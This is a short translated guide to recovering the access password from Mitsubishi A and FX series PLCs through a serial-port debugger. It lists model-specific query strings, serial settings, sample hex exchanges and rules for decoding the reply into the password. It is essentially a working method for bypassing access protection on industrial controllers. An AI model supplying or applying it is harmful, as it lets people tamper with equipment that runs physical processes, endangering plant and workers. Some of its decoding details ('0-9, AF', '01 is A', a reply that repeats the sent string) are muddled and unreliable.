01. Use a serial port debugger and set the relevant parameters.
02. Determine the Mitsubishi PLC model, and select the corresponding string in the serial port debugger according to the PLC model.
Appendix:
PLC model corresponding string
FX2\STX0700808\ETX6A
FX2N\STX0300808\ETX66
FX2_EPROM\STX0800808\ETX6B
FXON/FXOX\STX0800808\ETX6B
FX1N/FX1X\STX0800808\ETX6B
03. After sending, a string of characters will be displayed in the receiving box. If you are smart, you will definitely discover the mystery of these characters.
(That is, the returned password)
If you still can't figure it out, copy these strings into a HEX file and send it. (Remember to disconnect the PLC before sending.)
I suggest you set your own password, then use this method to read it once to see what's going on. After that, you'll know what's going on.
Password characters: 0-9, AF.
04. Examples illustrating the cracking of passwords for A and FX series PLCs:
Series A:
Send: A20700FF0205AE0008C3
Received: 0B00FF0200AA7755BBEFCDABA400
Password: ABCDEF
Send: A20700FF0205AE0008C3
Received: 0B00FF0200AA7755BBC1B1A1A4
Password: A1B1C1
Analysis: The password consists of the characters from BB to A4 in the returned characters, read from right to left in units of 2 characters each.
FX series:
Set the serial port to COM1, baud rate to 9600, data bits to 7, parity to E (even), and stop bits to 1.
Input: EHX, Display: ASC
send:
0230383030383038033642
Returns a string of hexadecimal ASCII codes, where 30 is the number 0, 31 is the number 1, 01 is A, 02 is B, and so on;
Example: 0230383030383038033642
\STX4236353433323130\ETX41
The password is: B6543210 (42=B)
